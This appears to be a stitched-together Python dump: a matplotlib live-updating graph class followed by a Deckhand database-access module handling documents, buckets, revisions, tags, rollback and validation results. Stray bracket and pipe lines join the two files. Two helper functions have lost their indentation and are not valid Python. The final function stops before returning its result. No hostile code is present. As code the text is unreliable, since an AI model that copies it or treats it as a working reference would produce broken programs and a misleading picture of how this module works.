        ]
|
import matplotlib.pyplot as plt
# TODO: Would be nice to be able to have an alternative graphing which would
# just draw all of the data at the end when final_update is called - more
# efficient version! And to be able to handle inline graphing solution
class DynamicGraph():
    """
    Simple utility to allow updating a graph as the values to the graph change over time
    - changing the number of data points, or their values.
    Parameters
    ------
    graph_title
        If provided, will be used as the title for the plot
    xlabel
        Optional label for the x-axis
    ylabel
        Optional label for the y-axis
    Notes
    ------
    If the graph becomes overlaid by later figures, make sure to use plt.figure()
    before calling any other plt functions.
    WARNING
    --------
    When adding new elements, the data will be duplicated so it can get quite slow with huge arrays.
    Best to not graph every point, but only every few points
    """
    def __init__(self, graph_title=None, xlabel=None, ylabel=None):
        # Interactive mode so draw() calls update the window immediately.
        plt.ion()
        #Set up plot
        self.figure, self.ax = plt.subplots()
        # Start with an empty scatter-style line; redraw() supplies data.
        self.lines, = self.ax.plot([],[], 'o', markersize=3)
        if graph_title is not None:
            self.ax.set_title(graph_title)
        if xlabel is not None:
            self.ax.set_xlabel(xlabel)
        if ylabel is not None:
            self.ax.set_ylabel(ylabel)
        #Autoscale on unknown axis and known lims on the other
        self.ax.set_autoscaley_on(True)
        self.ax.set_autoscalex_on(True)
        self.ax.grid()
        # Now check to see if it has the wanted functionality.
        try:
            self.figure.canvas.flush_events()
        except NotImplementedError as e:
            raise NotImplementedError("Warning, you are using an inline graphing solution, so this approach will not work.", )
        # NOTE(review): stray blank print on every successful init --
        # presumably a debugging leftover.
        print()
    def redraw(self, xdata, ydata):
        """
        Regenerate the graph using the new data. Will rescale the axis as necessary.
        Parameters
        ------
        xdata : array-like, shape [n_samples]
            x-data values for ALL of the wanted data points
        ydata : array-like, shape [n_samples]
            y-data values for ALL of the wanted data points
        """
        #Update data (with the new _and_ the old points)
        self.lines.set_xdata(xdata)
        self.lines.set_ydata(ydata)
        #Need both of these in order to rescale
        self.ax.relim()
        self.ax.autoscale_view()
        #We need to draw *and* flush
        self.figure.canvas.draw()
        self.figure.canvas.flush_events()
    def final_update(self, xdata, ydata):
        """One last redraw, with a reminder about figure layering."""
        print("Note: If the graph becomes covered by later plots, please use plt.figure() first")
        self.redraw(xdata, ydata)
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines interface for DB access."""
import copy
import functools
import hashlib
import threading
from oslo_config import cfg
from oslo_db import exception as db_exception
from oslo_db import options
from oslo_db.sqlalchemy import session
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import sqlalchemy.orm as sa_orm
from sqlalchemy import text
from deckhand.common import utils
from deckhand.db.sqlalchemy import models
from deckhand.engine import utils as eng_utils
from deckhand import errors
from deckhand import types
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
options.set_defaults(CONF)
_FACADE = None
_LOCK = threading.Lock()
def _create_facade_lazily():
    """Create the module-global EngineFacade exactly once.

    Classic double-checked locking: the unlocked check keeps the common
    path cheap; the re-check under the lock prevents two threads from
    both constructing a facade.
    """
    global _LOCK, _FACADE
    if _FACADE is None:
        with _LOCK:
            if _FACADE is None:
                _FACADE = session.EngineFacade.from_config(
                    CONF, sqlite_fk=True)
    return _FACADE
def get_engine():
    """Return the SQLAlchemy engine from the shared facade."""
    return _create_facade_lazily().get_engine()
def get_session(autocommit=True, expire_on_commit=False):
    """Return a new database session from the shared facade."""
    return _create_facade_lazily().get_session(
        autocommit=autocommit, expire_on_commit=expire_on_commit)
def drop_db():
    """Unregister (drop) all model tables from the database."""
    models.unregister_models(get_engine())
def setup_db(connection_string, create_tables=False):
    """Register the model metadata and optionally create the tables."""
    models.register_models(get_engine(), connection_string)
    if create_tables:
        models.create_tables(get_engine())
def raw_query(query, **kwargs):
    """Execute a raw query against the database."""
    # Type matters when using ``bindparams``: any *_id parameter supplied
    # as a numeric string is coerced to a real integer first; anything
    # non-numeric is left untouched.
    for key in kwargs:
        if not key.endswith('_id'):
            continue
        try:
            kwargs[key] = int(kwargs[key])
        except ValueError:
            pass
    return get_engine().execute(text(query).bindparams(**kwargs))
def require_unique_document_schema(schema=None):
    """Decorator to enforce only one singleton document exists in the system.
    An example of a singleton document is a ``LayeringPolicy`` document.
    Only one singleton document can exist within the system at any time. It is
    an error to attempt to insert a new document with the same ``schema`` if it
    has a different ``metadata.name`` than the existing document.
    A singleton document that already exists can be updated, if the document
    that is passed in has the same name/schema as the existing one.
    The existing singleton document can be replaced by first deleting it
    and only then creating a new one.
    :raises SingletonDocumentConflict: if a singleton document in the system
        already exists and any of the documents to be created has the same
        ``schema`` but has a ``metadata.name`` that differs from the one
        already registered.
    """
    def decorator(f):
        # Schema validity is checked at decoration time, not per call.
        if schema not in types.DOCUMENT_SCHEMA_TYPES:
            raise errors.DeckhandException(
                'Unrecognized document schema %s.' % schema)
        @functools.wraps(f)
        def wrapper(bucket_name, documents, *args, **kwargs):
            existing_documents = revision_documents_get(
                schema=schema, deleted=False, include_history=False)
            existing_document_names = [
                eng_utils.meta(x) for x in existing_documents
            ]
            # Documents with this schema whose metadata does not match any
            # already-registered singleton are conflicts.
            conflicting_names = [
                eng_utils.meta(x) for x in documents
                if eng_utils.meta(x) not in existing_document_names and
                x['schema'].startswith(schema)
            ]
            if existing_document_names and conflicting_names:
                raise errors.SingletonDocumentConflict(
                    schema=existing_document_names[0][0],
                    layer=existing_document_names[0][1],
                    name=existing_document_names[0][2],
                    conflict=', '.join(["[%s, %s] %s" % (x[0], x[1], x[2])
                                        for x in conflicting_names]))
            return f(bucket_name, documents, *args, **kwargs)
        return wrapper
    return decorator
@require_unique_document_schema(types.LAYERING_POLICY_SCHEMA)
def documents_create(bucket_name, documents, session=None):
    """Create a set of documents and associated bucket.
    If no changes are detected, a new revision will not be created. This
    allows services to periodically re-register their schemas without
    creating unnecessary revisions.
    :param bucket_name: The name of the bucket with which to associate created
        documents.
    :param documents: List of documents to be created.
    :param session: Database session object.
    :returns: List of created documents in dictionary format.
    :raises DocumentExists: If the document already exists in the DB for any
        bucket.
    """
    session = session or get_session()
    resp = []
    with session.begin():
        documents_to_create = _documents_create(bucket_name, documents,
                                                session=session)
        # The documents to be deleted are computed by comparing the documents
        # for the previous revision (if it exists) that belong to `bucket_name`
        # with `documents`: the difference between the former and the latter.
        document_history = [
            d for d in revision_documents_get(bucket_name=bucket_name,
                                              session=session)
        ]
        documents_to_delete = [
            h for h in document_history if eng_utils.meta(h) not in [
                eng_utils.meta(d) for d in documents]
        ]
        # Only create a revision if any docs have been created, changed or
        # deleted.
        if any([documents_to_create, documents_to_delete]):
            revision = revision_create(session=session)
            bucket = bucket_get_or_create(bucket_name, session=session)
            if documents_to_delete:
                LOG.debug('Deleting documents: %s.',
                          [eng_utils.meta(d) for d in documents_to_delete])
                deleted_documents = []
                # Deletions are recorded as tombstone documents tied to the
                # new revision (see document_delete).
                for d in documents_to_delete:
                    doc = document_delete(d, revision['id'], bucket,
                                          session=session)
                    deleted_documents.append(doc)
                    resp.append(doc)
            if documents_to_create:
                LOG.debug(
                    'Creating documents: %s.', [
                        (d['schema'], d['layer'], d['name'])
                        for d in documents_to_create
                    ]
                )
                for doc in documents_to_create:
                    doc['bucket_id'] = bucket['id']
                    doc['revision_id'] = revision['id']
                    # Preserve revision history for unchanged documents by
                    # keeping any orig_revision_id set by _documents_create.
                    if not doc.get('orig_revision_id'):
                        doc['orig_revision_id'] = doc['revision_id']
                    try:
                        doc.save(session=session)
                    except db_exception.DBDuplicateEntry:
                        raise errors.DuplicateDocumentExists(
                            schema=doc['schema'], layer=doc['layer'],
                            name=doc['name'], bucket=bucket['name'])
                    resp.append(doc.to_dict())
    # NOTE(fmontei): The orig_revision_id is not copied into the
    # revision_id for each created document, because the revision_id here
    # should reference the just-created revision. In case the user needs
    # the original revision_id, that is returned as well.
    return resp
def document_delete(document, revision_id, bucket, session=None):
    """Delete a document
    Creates a new document with the bare minimum information about the document
    that is to be deleted, and then sets the appropriate deleted fields
    :param document: document object/dict to be deleted
    :param revision_id: id of the revision where the document is to be deleted
    :param bucket: bucket object/dict where the document will be deleted from
    :param session: Database session object.
    :return: dict representation of deleted document
    """
    session = session or get_session()
    doc = models.Document()
    # Store bare minimum information about the document.
    doc['schema'] = document['schema']
    doc['name'] = document['name']
    doc['layer'] = document['layer']
    doc['data'] = {}
    doc['meta'] = document['metadata']
    # Hashes are computed over empty payloads since the tombstone carries
    # no data of its own.
    doc['data_hash'] = _make_hash({})
    doc['metadata_hash'] = _make_hash({})
    doc['bucket_id'] = bucket['id']
    doc['revision_id'] = revision_id
    # Save and mark the document as `deleted` in the database.
    try:
        doc.save(session=session)
    except db_exception.DBDuplicateEntry:
        raise errors.DuplicateDocumentExists(
            schema=doc['schema'], layer=doc['layer'],
            name=doc['name'], bucket=bucket['name'])
    doc.safe_delete(session=session)
    return doc.to_dict()
def documents_delete_from_buckets_list(bucket_names, session=None):
    """Delete all documents in the provided list of buckets
    :param bucket_names: list of bucket names for which the associated
        buckets and their documents need to be deleted.
    :param session: Database session object.
    :returns: A new model.Revisions object after all the documents have been
        deleted.
    """
    session = session or get_session()
    with session.begin():
        # Create a new revision
        revision = models.Revision()
        revision.save(session=session)
        for bucket_name in bucket_names:
            # Only live documents need tombstones; skip ones already deleted.
            documents_to_delete = [
                d for d in revision_documents_get(bucket_name=bucket_name,
                                                  session=session)
                if "deleted" not in d or not d['deleted']
            ]
            bucket = bucket_get_or_create(bucket_name, session=session)
            if documents_to_delete:
                LOG.debug('Deleting documents: %s.',
                          [eng_utils.meta(d) for d in documents_to_delete])
                for document in documents_to_delete:
                    document_delete(document, revision['id'], bucket,
                                    session=session)
    return revision
def _documents_create(bucket_name, documents, session=None):
    """Prepare Document models for creation, preserving revision history.

    Fills in metadata defaults, hashes each document's data/metadata, and,
    for documents unchanged since the latest revision, carries over the
    original revision id so revision history stays intact.

    :param bucket_name: Bucket the documents will belong to.
    :param documents: List of document dicts (deep-copied; not mutated).
    :param session: Database session object.
    :returns: List of unsaved ``models.Document`` objects for all documents.
    :raises DuplicateDocumentExists: If a matching document already exists
        in a different bucket.
    """
    documents = copy.deepcopy(documents)
    session = session or get_session()
    filters = ('name', 'schema', 'layer')
    changed_documents = []
    def _document_create(document):
        # Wrap the prepared dict in a Document model (not yet saved).
        model = models.Document()
        model.update(document)
        return model
    for document in documents:
        document.setdefault('data', {})
        document = _fill_in_metadata_defaults(document)
        # Hash the document's metadata and data to later efficiently check
        # whether those data have changed.
        document['data_hash'] = _make_hash(document['data'])
        document['metadata_hash'] = _make_hash(document['meta'])
        try:
            existing_document = document_get(
                raw_dict=True, deleted=False, revision_id='latest',
                **{x: document[x] for x in filters})
        except errors.DocumentNotFound:
            # Ignore bad data at this point. Allow creation to bubble up the
            # error related to bad data.
            existing_document = None
        if existing_document:
            # If the document already exists in another bucket, raise an error.
            if existing_document['bucket_name'] != bucket_name:
                raise errors.DuplicateDocumentExists(
                    schema=existing_document['schema'],
                    name=existing_document['name'],
                    layer=existing_document['layer'],
                    bucket=existing_document['bucket_name'])
            # By this point we know existing_document and document have the
            # same name, schema and layer due to the filters passed to the DB
            # query. But still want to check whether the document is precisely
            # the same one by comparing metadata/data hashes.
            if (existing_document['data_hash'] == document['data_hash'] and
                existing_document['metadata_hash'] == document[
                    'metadata_hash']):
                # Since the document has not changed, reference the original
                # revision in which it was created. This is necessary so that
                # the correct revision history is maintained.
                if existing_document['orig_revision_id']:
                    document['orig_revision_id'] = existing_document[
                        'orig_revision_id']
                else:
                    document['orig_revision_id'] = existing_document[
                        'revision_id']
    # Create all documents, even unchanged ones, for the current revision. This
    # makes the generation of the revision diff a lot easier.
    for document in documents:
        doc = _document_create(document)
        changed_documents.append(doc)
    return changed_documents
def _fill_in_metadata_defaults(document):
document['meta'] = document.pop('metadata')
document['name'] = document['meta']['name']
if not document['meta'].get('storagePolicy', None):
document['meta']['storagePolicy'] = 'cleartext'
document['meta'].setdefault('layeringDefinition', {})
document['layer'] = document['meta']['layeringDefinition'].get('layer')
if 'abstract' not in document['meta']['layeringDefinition']:
document['meta']['layeringDefinition']['abstract'] = False
if 'replacement' not in document['meta']:
document['meta']['replacement'] = False
return document
def _make_hash(data):
return hashlib.sha256(
json.dumps(data, sort_keys=True).encode('utf-8')).hexdigest()
def document_get(session=None, raw_dict=False, revision_id=None, **filters):
    """Retrieve the first document for ``revision_id`` that match ``filters``.
    :param session: Database session object.
    :param raw_dict: Whether to retrieve the exact way the data is stored in
        DB if ``True``, else the way users expect the data.
    :param revision_id: The ID corresponding to the ``Revision`` object. If
        it is "latest", then retrieve the latest revision, if one exists.
    :param filters: Dictionary attributes (including nested) used to filter
        out revision documents.
    :returns: Dictionary representation of retrieved document.
    :raises: DocumentNotFound if the document wasn't found.
    """
    session = session or get_session()
    if revision_id == 'latest':
        revision = session.query(models.Revision)\
            .order_by(models.Revision.created_at.desc())\
            .first()
        if revision:
            filters['revision_id'] = revision.id
    elif revision_id:
        filters['revision_id'] = revision_id
    # TODO(fmontei): Currently Deckhand doesn't support filtering by nested
    # JSON fields via sqlalchemy. For now, filter the documents using all
    # "regular" filters via sqlalchemy and all nested filters via Python.
    # NOTE: 'schema' is treated as nested because it is matched semantically
    # (see utils.deepfilter) rather than by exact column equality.
    nested_filters = {}
    for f in filters.copy():
        if any([x in f for x in ('.', 'schema')]):
            nested_filters.setdefault(f, filters.pop(f))
    # Documents with the same metadata.name and schema can exist across
    # different revisions, so it is necessary to order documents by creation
    # date, then return the first document that matches all desired filters.
    documents = session.query(models.Document)\
        .filter_by(**filters)\
        .order_by(models.Document.created_at.desc())\
        .all()
    for doc in documents:
        d = doc.to_dict(raw_dict=raw_dict)
        if utils.deepfilter(d, **nested_filters):
            return d
    # Merge nested filters back in so the error message shows all criteria.
    filters.update(nested_filters)
    raise errors.DocumentNotFound(filters=filters)
def document_get_all(session=None, raw_dict=False, revision_id=None,
                     **filters):
    """Retrieve all documents for ``revision_id`` that match ``filters``.
    :param session: Database session object.
    :param raw_dict: Whether to retrieve the exact way the data is stored in
        DB if ``True``, else the way users expect the data.
    :param revision_id: The ID corresponding to the ``Revision`` object. If
        it is "latest", then retrieve the latest revision, if one exists.
    :param filters: Dictionary attributes (including nested) used to filter
        out revision documents.
    :returns: Dictionary representation of each retrieved document.
    """
    session = session or get_session()
    if revision_id == 'latest':
        revision = session.query(models.Revision)\
            .order_by(models.Revision.created_at.desc())\
            .first()
        if revision:
            filters['revision_id'] = revision.id
    elif revision_id:
        filters['revision_id'] = revision_id
    # TODO(fmontei): Currently Deckhand doesn't support filtering by nested
    # JSON fields via sqlalchemy. For now, filter the documents using all
    # "regular" filters via sqlalchemy and all nested filters via Python.
    nested_filters = {}
    for f in filters.copy():
        if any([x in f for x in ('.', 'schema')]):
            nested_filters.setdefault(f, filters.pop(f))
    # Retrieve the most recently created documents for the revision, because
    # documents with the same metadata.name and schema can exist across
    # different revisions.
    documents = session.query(models.Document)\
        .filter_by(**filters)\
        .order_by(models.Document.created_at.desc())\
        .all()
    final_documents = []
    for doc in documents:
        d = doc.to_dict(raw_dict=raw_dict)
        if utils.deepfilter(d, **nested_filters):
            final_documents.append(d)
    return final_documents
####################
def bucket_get_or_create(bucket_name, session=None):
    """Retrieve or create bucket.
    Retrieve the ``Bucket`` DB object by ``bucket_name`` if it exists
    or else create a new ``Bucket`` DB object by ``bucket_name``.
    :param bucket_name: Unique identifier used for creating or retrieving
        a bucket.
    :param session: Database session object.
    :returns: Dictionary representation of created/retrieved bucket.
    """
    session = session or get_session()
    try:
        bucket = session.query(models.Bucket)\
            .filter_by(name=bucket_name)\
            .one()
    except sa_orm.exc.NoResultFound:
        # No bucket with this name yet: create one on the fly.
        bucket = models.Bucket()
        bucket.update({'name': bucket_name})
        bucket.save(session=session)
    return bucket.to_dict()
####################
def bucket_get_all(session=None, **filters):
    """Return list of all buckets.

    :param session: Database session object.
    :param filters: Key-value pairs applied (via deepfilter) to each bucket's
        dict form to decide inclusion.
    :returns: List of ``models.Bucket`` objects whose dictionary
        representation matches ``filters``.
    """
    session = session or get_session()
    all_buckets = session.query(models.Bucket)\
        .all()
    # Filter on the dict form but return the model objects themselves,
    # matching the existing contract relied on by callers.
    return [b for b in all_buckets
            if utils.deepfilter(b.to_dict(), **filters)]
def revision_create(session=None):
    """Create a revision.

    :param session: Database session object.
    :returns: Dictionary representation of created revision.
    """
    revision = models.Revision()
    revision.save(session=session or get_session())
    return revision.to_dict()
def revision_get(revision_id=None, session=None):
    """Return the specified `revision_id`.
    :param revision_id: The ID corresponding to the ``Revision`` object.
    :param session: Database session object.
    :returns: Dictionary representation of retrieved revision.
    :raises RevisionNotFound: if the revision was not found.
    """
    session = session or get_session()
    try:
        revision = session.query(models.Revision)\
            .filter_by(id=revision_id)\
            .one()\
            .to_dict()
    except sa_orm.exc.NoResultFound:
        raise errors.RevisionNotFound(revision_id=revision_id)
    # Rewrite revision_id on unchanged documents to their original revision
    # so the returned history is accurate.
    revision['documents'] = _update_revision_history(revision['documents'])
    return revision
def revision_get_latest(session=None):
    """Return the latest revision.
    :param session: Database session object.
    :returns: Dictionary representation of latest revision.
    """
    session = session or get_session()
    latest_revision = session.query(models.Revision)\
        .order_by(models.Revision.created_at.desc())\
        .first()
    if latest_revision:
        latest_revision = latest_revision.to_dict()
        latest_revision['documents'] = _update_revision_history(
            latest_revision['documents'])
    else:
        # If the latest revision doesn't exist, assume an empty revision
        # history and return a dummy revision instead for the purposes of
        # revision rollback.
        latest_revision = {'documents': [], 'id': 0}
    return latest_revision
def require_revision_exists(f):
    """Decorator to require the specified revision to exist.
    Requires the wrapped function to use revision_id as the first argument. If
    revision_id is not provided, then the check is not performed.
    """
    @functools.wraps(f)
    def wrapper(revision_id=None, *args, **kwargs):
        if not revision_id:
            # No revision supplied: skip the existence check entirely.
            return f(revision_id, *args, **kwargs)
        revision_get(revision_id)  # raises RevisionNotFound if missing
        return f(revision_id, *args, **kwargs)
    return wrapper
def _update_revision_history(documents):
# Since documents that are unchanged across revisions need to be saved for
# each revision, we need to ensure that the original revision is shown
# for the document's `revision_id` to maintain the correct revision
# history.
for doc in documents:
if doc['orig_revision_id']:
doc['revision_id'] = doc['orig_revision_id']
return documents
def revision_get_all(session=None, **filters):
    """Return list of all revisions.
    :param session: Database session object.
    :param filters: Key-value pairs applied to each revision's dict form
        (via deepfilter) to decide inclusion.
    :returns: List of dictionary representations of retrieved revisions.
    """
    session = session or get_session()
    revisions = session.query(models.Revision)\
        .all()
    result = []
    for revision in revisions:
        revision_dict = revision.to_dict()
        if utils.deepfilter(revision_dict, **filters):
            # Rewrite revision ids on unchanged documents so history is
            # reported against their original revisions.
            revision_dict['documents'] = _update_revision_history(
                revision_dict['documents'])
            result.append(revision_dict)
    return result
def revision_delete_all():
    """Delete all revisions and resets primary key index back to 1 for each
    table in the database.
    .. warning::
        Effectively purges all data from database.
    :returns: None
    """
    engine = get_engine()
    if engine.name == 'postgresql':
        # NOTE(fmontei): While cascade should delete all data from all tables,
        # we also need to reset the index to 1 for each table.
        for table in ['buckets', 'revisions', 'revision_tags', 'documents',
                      'validations']:
            engine.execute(
                text("TRUNCATE TABLE %s RESTART IDENTITY CASCADE;" % table)
                .execution_options(autocommit=True))
    else:
        # Non-postgres backends (e.g. sqlite): rely on FK cascade from
        # revisions; identity reset is not performed here.
        raw_query("DELETE FROM revisions;")
@require_revision_exists
def revision_documents_get(revision_id=None, include_history=True,
                           unique_only=True, session=None, **filters):
    """Return the documents that match filters for the specified `revision_id`.
    :param revision_id: The ID corresponding to the ``Revision`` object. If the
        ID is ``None``, then retrieve the latest revision, if one exists.
    :param include_history: Return all documents for revision history prior
        and up to current revision, if ``True``. Default is ``True``.
    :param unique_only: Return only unique documents if ``True``. Default is
        ``True``.
    :param session: Database session object.
    :param filters: Key-value pairs used for filtering out revision documents.
    :returns: All revision documents for ``revision_id`` that match the
        ``filters``, including document revision history if applicable.
    :raises RevisionNotFound: if the revision was not found.
    """
    session = session or get_session()
    revision_documents = []
    try:
        if revision_id:
            revision = session.query(models.Revision)\
                .filter_by(id=revision_id)\
                .one()
        else:
            # If no revision_id is specified, grab the latest one.
            revision = session.query(models.Revision)\
                .order_by(models.Revision.created_at.desc())\
                .first()
        if revision:
            revision_documents = revision.to_dict()['documents']
            if include_history:
                # All revisions strictly older than the target one, oldest
                # first, so newer documents override older duplicates later.
                relevant_revisions = session.query(models.Revision)\
                    .filter(models.Revision.created_at < revision.created_at)\
                    .order_by(models.Revision.created_at)\
                    .all()
                # Include documents from older revisions in response body.
                for relevant_revision in relevant_revisions:
                    revision_documents.extend(
                        relevant_revision.to_dict()['documents'])
    except sa_orm.exc.NoResultFound:
        raise errors.RevisionNotFound(revision_id=revision_id)
    revision_documents = _update_revision_history(revision_documents)
    filtered_documents = eng_utils.filter_revision_documents(
        revision_documents, unique_only, **filters)
    return filtered_documents
####################
@require_revision_exists
def revision_tag_create(revision_id, tag, data=None, session=None):
    """Create a revision tag.
    If a tag already exists by name ``tag``, the request is ignored.
    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param tag: Name of the revision tag.
    :param data: Dictionary of data to be associated with tag.
    :param session: Database session object.
    :returns: The tag that was created if not already present in the database,
        else None.
    :raises RevisionTagBadFormat: If data is neither None nor dictionary.
    """
    session = session or get_session()
    tag_model = models.RevisionTag()
    if data is None:
        data = {}
    if data and not isinstance(data, dict):
        raise errors.RevisionTagBadFormat(data=data)
    try:
        with session.begin():
            tag_model.update(
                {'tag': tag, 'data': data, 'revision_id': revision_id})
            tag_model.save(session=session)
        resp = tag_model.to_dict()
    except db_exception.DBDuplicateEntry:
        # Update the revision tag if it already exists.
        LOG.debug('Tag %s already exists for revision_id %s. Attempting to '
                  'update the entry.', tag, revision_id)
        try:
            tag_to_update = session.query(models.RevisionTag)\
                .filter_by(tag=tag, revision_id=revision_id)\
                .one()
        except sa_orm.exc.NoResultFound:
            # The duplicate entry vanished between the insert attempt and
            # the lookup; report the tag as not found.
            raise errors.RevisionTagNotFound(tag=tag, revision=revision_id)
        tag_to_update.update({'data': data})
        tag_to_update.save(session=session)
        resp = tag_to_update.to_dict()
    return resp
@require_revision_exists
def revision_tag_get(revision_id, tag, session=None):
    """Retrieve tag details.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param tag: Name of the revision tag.
    :param session: Database session object.
    :returns: Dictionary representation of the retrieved tag.
    :raises RevisionTagNotFound: If ``tag`` for ``revision_id`` was not found.
    """
    session = session or get_session()
    try:
        # Use a distinct local name so the `tag` parameter isn't shadowed.
        tag_model = session.query(models.RevisionTag)\
            .filter_by(tag=tag, revision_id=revision_id)\
            .one()
    except sa_orm.exc.NoResultFound:
        raise errors.RevisionTagNotFound(tag=tag, revision=revision_id)
    return tag_model.to_dict()
@require_revision_exists
def revision_tag_get_all(revision_id, session=None):
    """Return list of tags for a revision.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param session: Database session object.
    :returns: List of tag dicts for ``revision_id``, ordered by tag name.
    """
    session = session or get_session()
    query = session.query(models.RevisionTag)\
        .filter_by(revision_id=revision_id)\
        .order_by(models.RevisionTag.tag)
    return [entry.to_dict() for entry in query.all()]
@require_revision_exists
def revision_tag_delete(revision_id, tag, session=None):
    """Delete a specific tag for a revision.
    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param tag: Name of the revision tag.
    :param session: Database session object (unused; delete is issued
        directly against the engine via raw_query).
    :returns: None
    :raises RevisionTagNotFound: If no row was deleted.
    """
    query = raw_query(
        """DELETE FROM revision_tags WHERE tag=:tag AND
            revision_id=:revision_id;""", tag=tag, revision_id=revision_id)
    # rowcount of 0 means no matching tag existed for this revision.
    if query.rowcount == 0:
        raise errors.RevisionTagNotFound(tag=tag, revision=revision_id)
@require_revision_exists
def revision_tag_delete_all(revision_id, session=None):
    """Delete all tags for a revision.
    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param session: Database session object.
    :returns: None
    """
    session = session or get_session()
    # Bulk delete; synchronize_session=False skips in-memory session sync,
    # which is safe here since the session is not reused afterwards.
    session.query(models.RevisionTag)\
        .filter_by(revision_id=revision_id)\
        .delete(synchronize_session=False)
####################
def revision_rollback(revision_id, latest_revision, session=None):
    """Rollback the latest revision to revision specified by ``revision_id``.
    Rolls back the latest revision to the revision specified by ``revision_id``
    thereby creating a new, carbon-copy revision.
    :param revision_id: Revision ID to which to rollback.
    :param latest_revision: Dictionary representation of the latest revision
        in the system.
    :param session: Database session object.
    :returns: The newly created revision.
    """
    session = session or get_session()
    latest_revision_docs = revision_documents_get(latest_revision['id'],
                                                  session=session)
    # Hash pairs of the latest revision's documents, used below to detect
    # which documents differ between target and latest revisions.
    latest_revision_hashes = [
        (d['data_hash'], d['metadata_hash']) for d in latest_revision_docs
    ]
    if latest_revision['id'] == revision_id:
        LOG.debug('The revision being rolled back to is the current revision.'
                  'Expect no meaningful changes.')
    if revision_id == 0:
        # Delete all existing documents in all buckets
        all_buckets = bucket_get_all(deleted=False)
        bucket_names = [str(b['name']) for b in all_buckets]
        revision = documents_delete_from_buckets_list(bucket_names,
                                                      session=session)
        return revision.to_dict()
    else:
        # Sorting the documents so the documents in the new revision are in
        # the same order as the previous revision to support stable testing
        orig_revision_docs = sorted(revision_documents_get(revision_id,
                                                           session=session),
                                    key=lambda d: d['id'])
    # A mechanism for determining whether a particular document has changed
    # between revisions. Keyed with the document_id, the value is True if
    # it has changed, else False.
    doc_diff = {}
    # List of unique buckets that exist in this revision
    unique_buckets = []
    for orig_doc in orig_revision_docs:
        if ((orig_doc['data_hash'], orig_doc['metadata_hash'])
                not in latest_revision_hashes):
            doc_diff[orig_doc['id']] = True
        else:
            doc_diff[orig_doc['id']] = False
        if orig_doc['bucket_id'] not in unique_buckets:
            unique_buckets.append(orig_doc['bucket_id'])
    # We need to find which buckets did not exist at this revision
    buckets_to_delete = []
    all_buckets = bucket_get_all(deleted=False)
    for bucket in all_buckets:
        if bucket['id'] not in unique_buckets:
            buckets_to_delete.append(str(bucket['name']))
    # Create the new revision,
    if len(buckets_to_delete) > 0:
        # Deleting from the extra buckets also creates the new revision.
        new_revision = documents_delete_from_buckets_list(buckets_to_delete,
                                                          session=session)
    else:
        new_revision = models.Revision()
        with session.begin():
            new_revision.save(session=session)
    # No changes have been made between the target revision to rollback to
    # and the latest revision.
    if set(doc_diff.values()) == set([False]):
        LOG.debug('The revision being rolled back to has the same documents '
                  'as that of the current revision. Expect no meaningful '
                  'changes.')
    # Create the documents for the revision.
    for orig_document in orig_revision_docs:
        orig_document['revision_id'] = new_revision['id']
        orig_document['meta'] = orig_document.pop('metadata')
        new_document = models.Document()
        new_document.update({x: orig_document[x] for x in (
            'name', 'meta', 'layer', 'data', 'data_hash', 'metadata_hash',
            'schema', 'bucket_id')})
        new_document['revision_id'] = new_revision['id']
        # If the document has changed, then use the revision_id of the new
        # revision, otherwise use the original revision_id to preserve the
        # revision history.
        if doc_diff[orig_document['id']]:
            new_document['orig_revision_id'] = new_revision['id']
        else:
            new_document['orig_revision_id'] = revision_id
        with session.begin():
            new_document.save(session=session)
    new_revision = new_revision.to_dict()
    new_revision['documents'] = _update_revision_history(
        new_revision['documents'])
    return new_revision
####################
def _get_validation_policies_for_revision(revision_id, session=None):
    """Return all ValidationPolicy documents for ``revision_id``.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param session: Database session object.
    :returns: List of ValidationPolicy document dicts; empty list when the
        revision has none.
    """
    session = session or get_session()
    # Check if a ValidationPolicy for the revision exists.
    validation_policies = document_get_all(
        session, revision_id=revision_id, deleted=False,
        schema=types.VALIDATION_POLICY_SCHEMA)
    if not validation_policies:
        # Otherwise return early.
        LOG.debug('Failed to find a ValidationPolicy for revision ID %s. '
                  'Only the "%s" results will be included in the response.',
                  revision_id, types.DECKHAND_SCHEMA_VALIDATION)
        validation_policies = []
    return validation_policies
@require_revision_exists
def validation_create(revision_id, val_name, val_data, session=None):
    """Create a validation result entry for a revision.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param val_name: Name of the validation.
    :param val_data: Dict which may contain ``status``, ``validator`` and
        ``errors`` keys describing the validation result.
    :param session: Database session object.
    :returns: Dictionary representation of the created validation.
    """
    session = session or get_session()
    validation_kwargs = {
        'revision_id': revision_id,
        'name': val_name,
        'status': val_data.get('status', None),
        'validator': val_data.get('validator', None),
        'errors': val_data.get('errors', []),
    }
    validation = models.Validation()
    with session.begin():
        validation.update(validation_kwargs)
        validation.save(session=session)
    return validation.to_dict()
@require_revision_exists
def validation_get_all(revision_id, session=None):
    """Return overall validation results for ``revision_id``.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param session: Database session object.
    :returns: View of (name, status) tuples keyed by validation name, after
        reconciling results against the revision's ValidationPolicy.
    """
    # Query selects only unique combinations of (name, status) from the
    # `Validations` table and prioritizes 'failure' result over 'success'
    # result via alphabetical ordering of the status column. Each document
    # has its own validation but for this query we want to return the result
    # of the overall validation for the revision. If just 1 document failed
    # validation, we regard the validation for the whole revision as 'failure'.
    session = session or get_session()
    query = raw_query("""
        SELECT DISTINCT name, status FROM validations as v1
            WHERE revision_id=:revision_id AND status = (
                SELECT status FROM validations as v2
                    WHERE v2.name = v1.name
                    ORDER BY status
                    LIMIT 1
            )
            GROUP BY name, status
            ORDER BY name, status;
    """, revision_id=revision_id)
    result = {v[0]: v for v in query.fetchall()}
